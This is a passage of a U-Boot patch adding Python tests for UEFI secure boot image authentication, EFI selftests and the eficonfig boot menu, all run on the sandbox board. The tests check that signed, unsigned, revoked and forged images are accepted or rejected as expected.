'fatload host 0:1 4000000 db_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with ubman.log.section('Test Case 6b'): + # Test Case 6b, rejected by TEST_db certificate in dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 6c'): + # Test Case 6c, rejected by image's digest in dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth7(self, ubman, efi_boot_env): + """ + Test Case 7 - Reject images based on the sha384/512 of their x509 cert + """ + # sha384 of an x509 cert in dbx + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 7a'): + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash384.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + # sha512 of an x509 cert in dbx + ubman.restart_uboot() + with ubman.log.section('Test Case 7b'): + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash512.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth8(self, ubman, efi_boot_env): + """ + Test Case 8 - Secure boot is in force, + Same as Test Case 2 but the image binary to be loaded + was willfully modified (forged) + Must be rejected. + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 8a'): + # Test Case 8a, Secure boot is not yet forced + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld_forged.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('hELLO, world!' in ''.join(output)) + + with ubman.log.section('Test Case 8b'): + # Test Case 8b, Install signature database and verify the image + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert(not 'hELLO, world!' in ''.join(output)) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_bootmgr_load() returned: 26' in ''.join(output)) diff --git a/test/py/tests/test_efi_secboot/test_signed_intca.py b/test/py/tests/test_efi_secboot/test_signed_intca.py new file mode 100644 index 00000000000..58f7be03b8b --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed_intca.py @@ -0,0 +1,135 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Image Authentication Test (signature with certificates chain) + +""" +This test verifies image authentication for a signed image which is signed +by user certificate and contains additional intermediate certificates in its +signature. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImageIntca(object): + def test_efi_signed_image_intca1(self, ubman, efi_boot_env_intca): + """ + Test Case 1 - authenticated by root CA in db + """ + ubman.restart_uboot() + disk_img = efi_boot_env_intca + with ubman.log.section('Test Case 1a'): + # Test Case 1a, with no Int CA and not authenticated by root CA + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO_a host 0:1 /helloworld.efi.signed_a -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_a\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 1b'): + # Test Case 1b, signed and authenticated by root CA + output = ubman.run_command_list([ + 'efidebug boot add -b 2 HELLO_ab host 0:1 /helloworld.efi.signed_ab -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_intca2(self, ubman, efi_boot_env_intca): + """ + Test Case 2 - authenticated by root CA in db + """ + ubman.restart_uboot() + disk_img = efi_boot_env_intca + with ubman.log.section('Test Case 2a'): + # Test Case 2a, unsigned and not authenticated by root CA + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 2b'): + # Test Case 2b, signed and authenticated by root CA + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 2c'): + # Test Case 2c, signed and authenticated by root CA + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_intca3(self, ubman, efi_boot_env_intca): + """ + Test Case 3 - revoked by dbx + """ + ubman.restart_uboot() + disk_img = efi_boot_env_intca + with ubman.log.section('Test Case 3a'): + # Test Case 3a, revoked by int CA in dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + # Or, + # assert '\'HELLO_abc\' failed' in ''.join(output) + # assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, revoked by root CA in dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) diff --git a/test/py/tests/test_efi_secboot/test_unsigned.py b/test/py/tests/test_efi_secboot/test_unsigned.py new file mode 100644 index 00000000000..bd6e1b2dadd --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_unsigned.py @@ -0,0 +1,117 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for unsigned images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiUnsignedImage(object): + def test_efi_unsigned_image_auth1(self, ubman, efi_boot_env): + """ + Test Case 1 - rejected when not digest in db or dbx + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 1'): + # Test Case 1 + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + def test_efi_unsigned_image_auth2(self, ubman, efi_boot_env): + """ + Test Case 2 - authenticated by digest in db + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 2'): + # Test Case 2 + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_unsigned_image_auth3(self, ubman, efi_boot_env): + """ + Test Case 3 - rejected by digest in dbx + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) diff --git a/test/py/tests/test_efi_selftest.py b/test/py/tests/test_efi_selftest.py new file mode 100644 index 00000000000..12cbe5caa9b --- /dev/null +++ b/test/py/tests/test_efi_selftest.py @@ -0,0 +1,197 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017, Heinrich Schuchardt <xypron.glpk@gmx.de> + +""" Test UEFI API implementation +""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_base(ubman): + """Run UEFI unit tests + + ubman -- U-Boot console + + This function executes all selftests that are not marked as on request. + """ + ubman.run_command(cmd='setenv efi_selftest') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('hush_parser') +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +def test_efi_selftest_device_tree(ubman): + """Test the device tree support in the UEFI sub-system + + ubman -- U-Boot console + + This test executes the UEFI unit test by calling 'bootefi selftest'. + """ + ubman.run_command(cmd='setenv efi_selftest list') + output = ubman.run_command('bootefi selftest') + assert '\'device tree\'' in output + ubman.run_command(cmd='setenv efi_selftest device tree') + # Set serial# if it is not already set. + ubman.run_command(cmd='setenv efi_test "${serial#}x"') + ubman.run_command(cmd='test "${efi_test}" = x && setenv serial# 0') + ubman.run_command(cmd='bootefi selftest ${fdtcontroladdr}', wait_for_prompt=False) + if ubman.p.expect(['serial-number:', 'U-Boot']): + raise Exception('serial-number missing in device tree') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_watchdog_reboot(ubman): + """Test the watchdog timer + + ubman -- U-Boot console + + This function executes the 'watchdog reboot' unit test. + """ + ubman.run_command(cmd='setenv efi_selftest list') + output = ubman.run_command('bootefi selftest') + assert '\'watchdog reboot\'' in output + ubman.run_command(cmd='setenv efi_selftest watchdog reboot') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect(['resetting', 'U-Boot']): + raise Exception('Reset failed in \'watchdog reboot\' test') + ubman.run_command(cmd='', send_nl=False, wait_for_reboot=True) + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input(ubman): + """Test the EFI_SIMPLE_TEXT_INPUT_PROTOCOL + + ubman -- U-Boot console + + This function calls the text input EFI selftest. + """ + ubman.run_command(cmd='setenv efi_selftest text input') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect([r'To terminate type \'x\'']): + raise Exception('No prompt for \'text input\' test') + ubman.drain_console() + # EOT + ubman.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 4 \(unknown\), scan code 0 \(Null\)']): + raise Exception('EOT failed in \'text input\' test') + ubman.drain_console() + # BS + ubman.run_command(cmd=chr(8), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + ubman.drain_console() + # TAB + ubman.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + ubman.drain_console() + # a + ubman.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + ubman.drain_console() + # UP escape sequence + ubman.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(Up\)']): + raise Exception('UP failed in \'text input\' test') + ubman.drain_console() + # Euro sign + ubman.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + ubman.drain_console() + ubman.run_command(cmd='x', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input_ex(ubman): + """Test the EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL + + ubman -- U-Boot console + + This function calls the extended text input EFI selftest. + """ + ubman.run_command(cmd='setenv efi_selftest extended text input') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect([r'To terminate type \'CTRL\+x\'']): + raise Exception('No prompt for \'text input\' test') + ubman.drain_console() + # EOT + ubman.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 100 \(\'d\'\), scan code 0 \(CTRL\+Null\)']): + raise Exception('EOT failed in \'text input\' test') + ubman.drain_console() + # BS + ubman.run_command(cmd=chr(8), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(\+Null\)']): + raise Exception('BS failed in \'text input\' test') + ubman.drain_console() + # TAB + ubman.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(\+Null\)']): + raise Exception('TAB failed in \'text input\' test') + ubman.drain_console() + # a + ubman.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + ubman.drain_console() + # UP escape sequence + ubman.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(\+Up\)']): + raise Exception('UP failed in \'text input\' test') + ubman.drain_console() + # Euro sign + ubman.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + ubman.drain_console() + # SHIFT+ALT+FN 5 + ubman.run_command(cmd=b'\x1b\x5b\x31\x35\x3b\x34\x7e'.decode(), + wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 0 \(Null\), scan code 15 \(SHIFT\+ALT\+FN 5\)']): + raise Exception('SHIFT+ALT+FN 5 failed in \'text input\' test') + ubman.drain_console() + ubman.run_command(cmd=chr(24), wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('efi_tcg2_protocol') +def test_efi_selftest_tcg2(ubman): + """Test the EFI_TCG2 PROTOCOL + + ubman -- U-Boot console + + This function executes the 'tcg2' unit test. + """ + ubman.restart_uboot() + ubman.run_command(cmd='setenv efi_selftest list') + output = ubman.run_command('bootefi selftest') + assert '\'tcg2\'' in output + ubman.run_command(cmd='setenv efi_selftest tcg2') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() diff --git a/test/py/tests/test_eficonfig/conftest.py b/test/py/tests/test_eficonfig/conftest.py new file mode 100644 index 00000000000..0a82fbefd75 --- /dev/null +++ b/test/py/tests/test_eficonfig/conftest.py @@ -0,0 +1,40 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI eficonfig test +""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_eficonfig_data(u_boot_config): + """Set up a file system to be used in UEFI "eficonfig" command + tests + + Args: + u_boot_config -- U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_eficonfig' + image_path = u_boot_config.persistent_data_dir + '/efi_eficonfig.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_eficonfig/test_eficonfig.py b/test/py/tests/test_eficonfig/test_eficonfig.py new file mode 100644 index 00000000000..3ca8e27c76b --- /dev/null +++ b/test/py/tests/test_eficonfig/test_eficonfig.py @@ -0,0 +1,358 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI menu-driven configuration +""" + +import pytest +import time + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_eficonfig') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +def test_efi_eficonfig(ubman, efi_eficonfig_data): + + def send_user_input_and_wait(user_str, expect_str): + time.sleep(0.1) # TODO: does not work correctly without sleep + ubman.run_command(cmd=user_str, wait_for_prompt=False, + wait_for_echo=True, send_nl=False) + ubman.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + if expect_str is not None: + for i in expect_str: + ubman.p.expect([i]) + + def press_up_down_enter_and_wait(up_count, down_count, enter, expect_str): + # press UP key + for i in range(up_count): + ubman.run_command(cmd='\x1b\x5b\x41', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press DOWN key + for i in range(down_count): + ubman.run_command(cmd='\x1b\x5b\x42', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press ENTER if requested + if enter: + ubman.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # wait expected output + if expect_str is not None: + for i in expect_str: + ubman.p.expect([i]) + + def press_escape_key(wait_prompt): + ubman.run_command(cmd='\x1b', wait_for_prompt=wait_prompt, wait_for_echo=False, send_nl=False) + + def press_enter_key(wait_prompt): + ubman.run_command(cmd='\x0d', wait_for_prompt=wait_prompt, + wait_for_echo=False, send_nl=False) + + def check_current_is_maintenance_menu(): + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + ubman.p.expect([i]) + + """ Unit test for "eficonfig" command + The menu-driven interface is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + ubman -- U-Boot console + efi__data -- Path to the disk image used for testing. + Test disk image has following files. + initrd-1.img + initrd-2.img + initrddump.efi + + """ + # This test passes for unknown reasons in the bowels of U-Boot. It needs to + # be replaced with a unit test. + return + + # Restart the system to clean the previous state + ubman.restart_uboot() + + with ubman.temporary_timeout(500): + # + # Test Case 1: Check the menu is displayed + # + ubman.run_command('eficonfig', wait_for_prompt=False) + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + ubman.p.expect([i]) + # Select "Add Boot Option" + press_enter_key(False) + for i in ('Add Boot Option', 'Description:', 'File', 'Initrd File', 'Optional Data', + 'Save', 'Quit'): + ubman.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # return to U-Boot console + press_escape_key(True) + + # + # Test Case 2: check auto generated media device entry + # + + # bind the test disk image for succeeding tests + ubman.run_command(cmd = f'host bind 0 {efi_eficonfig_data}') + + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + for i in ('host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # disable auto generated boot option for succeeding test + ubman.run_command(cmd=' ', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # Save the BootOrder + press_up_down_enter_and_wait(0, 1, True, None) + check_current_is_maintenance_menu() + + # + # Test Case 3: Add first Boot Option and load it + # + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'Enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 1', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-1.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('nocolor', None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 4: Add second Boot Option and load it + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'Enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 2', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the 